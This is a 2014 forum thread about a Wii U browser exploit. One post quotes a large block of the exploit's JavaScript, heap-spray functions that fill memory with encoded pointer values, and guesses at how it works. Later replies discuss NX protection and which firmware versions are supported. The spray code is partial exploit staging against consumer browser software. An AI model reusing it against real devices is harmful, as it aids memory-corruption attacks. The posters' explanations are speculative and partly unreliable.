Page 1 of 1
Official Wii U Browser Exploit Released
Posted: Tue Jun 17, 2014 12:50 pm
by BSnake
Maybe someone is interested in this:
http://www.maxconsole.com/maxcon_forums ... t-Released
I have not tested it or anything else.
Re: Official Wii U Browser Exploit Released
Posted: Fri Jun 20, 2014 6:45 pm
by shadyblue9o9
Ok, i am asking this just because im curious as to how the wii u exploit is actually being executed...
[spoiler]function sprayOne(mem, size, v)
{
var a = new Uint32Array(size - 20);
for (var j = 0; j < a.length; j++) a[j] = v;
var t = document.createTextNode(String.fromCharCode.apply(null, new Uint32Array(a)));
mem.push(t);
}
function spray(size, n)
{
var string_size = size / 2;
var str = unescape("%u6000%u0000");
var c = unescape("%4bff%fffc");
while (str.length < string_size)
str += c;
var h1 = [];
h1[0] = str.substring(0, string_size);
for (i = 1; i <= n; i++)
h1
= unescape(h1[0]);
return h1;
}
function sprayInc(n)
{
var str = unescape("%u0e9a%u161c%u0000%u0001%u0000%u0002%u0000%u0003%u0000%u0004%u0000%u0005%u0000%u0006%u0000%u0007%u0000%u0008%u0000%u0009%u0000%u000a%u0000%u000b%u0000%u000c%u0000%u000d%u0000%u000e%u0000%u000f");
str += unescape("%u0000%u0010%u0000%u0011%u0000%u0012%u0000%u0013%u0000%u0014%u0000%u0015%u0000%u0016%u0000%u0017%u0000%u0018%u0000%u0019%u0000%u001a%u0000%u001b%u0000%u001c%u0000%u001d%u0000%u001e%u0000%u001f");
str += unescape("%u0000%u0020%u0000%u0021%u0000%u0022%u0000%u0023%u0000%u0024%u0000%u0025%u0000%u0026%u0000%u0027%u0000%u0028%u0000%u0029%u0000%u002a%u0000%u002b%u0000%u002c%u0000%u002d%u0000%u002e%u0000%u002f");
str += unescape("%u0000%u0030%u0000%u0031%u0000%u0032%u0000%u0033%u0000%u0034%u0000%u0035%u0000%u0036%u0000%u0037%u0000%u0038%u0000%u0039%u0000%u003a%u0000%u003b%u0000%u003c%u0000%u003d%u0000%u003e%u0000%u003f");
str += unescape("%u0000%u0040%u0000%u0041%u0000%u0042%u0000%u0043%u0000%u0044%u0000%u0045%u0000%u0046%u0000%u0047%u0000%u0048%u0000%u0049%u0000%u004a%u0000%u004b%u0000%u004c%u0000%u004d%u0000%u004e%u0000%u004f");
str += unescape("%u0000%u0050%u0000%u0051%u0000%u0052%u0000%u0053%u0000%u0054%u0000%u0055%u0000%u0056%u0000%u0057%u0000%u0058%u0000%u0059%u0000%u005a%u0000%u005b%u0000%u005c%u0000%u005d%u0000%u005e%u0000%u005f");
str += unescape("%u0000%u0060%u0000%u0061%u0000%u0062%u0000%u0063%u0000%u0064%u0000%u0065%u0000%u0066%u0000%u0067%u0000%u0068%u0000%u0069%u0000%u006a%u0000%u006b%u0000%u006c%u0000%u006d%u0000%u006e%u0000%u006f");
str += unescape("%u0000%u0070%u0000%u0071%u0000%u0072%u0000%u0073%u0000%u0074%u0000%u0075%u0000%u0076%u0000%u0077%u0000%u0078%u0000%u0079%u0000%u007a%u0000%u007b%u0000%u007c%u0000%u007d%u0000%u007e%u0000%u007f");
str += unescape("%u0000%u0080%u0000%u0081%u0000%u0082%u0000%u0083%u0000%u0084%u0000%u0085%u0000%u0086%u0000%u0087%u0000%u0088%u0000%u0089%u0000%u008a%u0000%u008b%u0000%u008c%u0000%u008d%u0000%u008e%u0000%u008f");
str += unescape("%u0000%u0090%u0000%u0091%u0000%u0092%u0000%u0093%u0000%u0094%u0000%u0095%u0000%u0096%u0000%u0097%u0000%u0098%u0000%u0099%u0000%u009a%u0000%u009b%u0000%u009c%u0000%u009d%u0000%u009e%u0000%u009f");
str += unescape("%u0000%u00a0%u0000%u00a1%u0000%u00a2%u0000%u00a3%u0000%u00a4%u0000%u00a5%u0000%u00a6%u0000%u00a7%u0000%u00a8%u0000%u00a9%u0000%u00aa%u0000%u00ab%u0000%u00ac%u0000%u00ad%u0000%u00ae%u0000%u00af");
str += unescape("%u0000%u00b0%u0000%u00b1%u0000%u00b2%u0000%u00b3%u0000%u00b4%u0000%u00b5%u0000%u00b6%u0000%u00b7%u0000%u00b8%u0000%u00b9%u0000%u00ba%u0000%u00bb%u0000%u00bc%u0000%u00bd%u0000%u00be%u0000%u00bf");
str += unescape("%u0000%u00c0%u0000%u00c1%u0000%u00c2%u0000%u00c3%u0000%u00c4%u0000%u00c5%u0000%u00c6%u0000%u00c7%u0000%u00c8%u0000%u00c9%u0000%u00ca%u0000%u00cb%u0000%u00cc%u0000%u00cd%u0000%u00ce%u0000%u00cf");
str += unescape("%u0000%u00d0%u0000%u00d1%u0000%u00d2%u0000%u00d3%u0000%u00d4%u0000%u00d5%u0000%u00d6%u0000%u00d7%u0000%u00d8%u0000%u00d9%u0000%u00da%u0000%u00db%u0000%u00dc%u0000%u00dd%u0000%u00de%u0000%u00df");
str += unescape("%u0000%u00e0%u0000%u00e1%u0000%u00e2%u0000%u00e3%u0000%u00e4%u0000%u00e5%u0000%u00e6%u0000%u00e7%u0000%u00e8%u0000%u00e9%u0000%u00ea%u0000%u00eb%u0000%u00ec%u0000%u00ed%u0000%u00ee%u0000%u00ef");
str += unescape("%u0000%u00f0%u0000%u00f1%u0000%u00f2%u0000%u00f3%u0000%u00f4%u0000%u00f5%u0000%u00f6%u0000%u00f7%u0000%u00f8%u0000%u00f9%u0000%u00fa%u0000%u00fb%u0000%u00fc%u0000%u00fd%u0000%u00fe%u0000%u00ff");
str += unescape("%u0000%u0100%u0000%u0101%u0000%u0102%u0000%u0103%u0000%u0104%u0000%u0105%u0000%u0106%u0000%u0107%u0000%u0108%u0000%u0109%u0000%u010a%u0000%u010b%u0e9a%u161c%u0000%u010d%u0000%u010e%u0000%u010f");
str += unescape("%u0000%u0110%u0000%u0111%u0000%u0112%u0000%u0113%u0000%u0114%u0000%u0115%u0000%u0116%u0000%u0117%u0000%u0118%u0000%u0119%u0000%u011a%u0000%u011b%u0000%u011c%u0000%u011d%u0000%u011e%u0000%u011f");
str += unescape("%u0000%u0120%u0000%u0121%u0000%u0122%u0000%u0123%u0000%u0124%u0000%u0125%u0000%u0126%u0000%u0127%u0000%u0128%u0000%u0129%u0000%u012a%u0000%u012b%u0000%u012c%u0000%u012d%u0000%u012e%u0000%u012f");
str += unescape("%u0000%u0130%u0000%u0131%u0000%u0132%u0000%u0133%u0000%u0134%u0000%u0135%u0000%u0136%u0000%u0137%u0000%u0138%u0000%u0139%u0000%u013a%u0000%u013b%u0000%u013c%u0000%u013d%u0000%u013e%u0000%u013f");
str += unescape("%u0000%u0140%u0000%u0141%u0000%u0142%u0000%u0143%u0000%u0144%u0000%u0145%u0000%u0146%u0000%u0147%u0000%u0148%u0000%u0149%u0000%u014a%u0000%u014b%u0000%u014c%u0000%u014d%u0000%u014e%u0000%u014f");
str += unescape("%u0000%u0150%u0000%u0151%u0000%u0152%u0000%u0153%u0000%u0154%u0000%u0155%u0000%u0156%u0000%u0157%u0000%u0158%u0000%u0159%u0000%u015a%u0000%u015b%u0000%u015c%u0000%u015d%u0000%u015e%u0000%u015f");
var h1 = [];
h1[0] = str.substring(0, str.length);
for (i = 1; i <= n; i++)
h1 = unescape(h1[0]);
return h1;
}
function dsm(evnt)
{
// spray
var mem = [];
for (var j = 20; j < 2048; j++) sprayOne(mem, j, 0x1dd7b2c8);
// the code pointer will be read from value + 0x660
// 0x4 only if we spray 0
}
//var mem = dsm();
//alert(mem.length);
//var pointer = sprayPointer();
var pointer = sprayInc(30000);
//var code = spray(0x2c0, 60000);
//alert(pointer.length);
//alert(code.length);[/spoiler]
So this is the data (in the spoiler) that i pulled from the exploit... it seems to me that they are using the amount of memory the string is allotted to achieve the exploit. Im assuming that with the wii u, when the string is added to itself over and over and over, eventually the string exceeds the amount of memory it is allowed to hold, effectively overwriting important data that is causing the crash. Then the var h1 is getting actual address of it so that the user can later inject the code?
im kind of new to this, ive had about a year of c++ programming under my belt and none of that deals with actually causing a buffer overflow... but a lot of it has been fixing my own, out of range, overflows, and memory leak errors... 
.. so am i somewhat right hopefully? lol
also, i believe the reason the exploit does not crash the vita and just reloads the page is because once the maximum amount of memory the string is allowed to hold is reached, it just reloads the page (like a refresh) to clear the previous data... instead of letting the string continue to write data were it shouldn't :S
Re: Official Wii U Browser Exploit Released
Posted: Fri Jun 20, 2014 6:58 pm
by Omega2058
It simply sprays a string in increments at a memory location, going from the names and looking at what it does. Also the NX bit is enabled, so it won't work regardless.
I guess you're somewhat close.
Re: Official Wii U Browser Exploit Released
Posted: Fri Jun 20, 2014 7:41 pm
by shadyblue9o9
lol... sorry, well i tried it on my ps4 as well just to see what it would do and it says there is not enough system memory =_=
Re: Official Wii U Browser Exploit Released
Posted: Mon Aug 04, 2014 2:54 pm
by BSnake
Update:
Right now Wii U system software versions above and including 4.0.0 to 5.1.0 are supported.
Source
Re: Official Wii U Browser Exploit Released
Posted: Fri Jan 09, 2015 12:16 pm
by jiakhaan
Ok Thanks BSnake